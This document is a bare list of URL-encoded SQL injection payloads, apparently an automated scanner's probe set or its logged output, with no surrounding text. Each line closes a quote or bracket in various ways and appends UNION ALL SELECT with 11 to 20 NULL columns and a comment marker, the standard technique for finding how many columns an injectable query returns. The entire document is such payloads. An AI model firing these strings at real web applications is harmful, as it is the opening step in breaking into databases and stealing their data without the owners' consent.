1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 